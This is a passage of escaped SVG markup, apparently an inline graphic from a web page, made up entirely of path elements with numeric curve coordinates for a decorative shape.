d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path 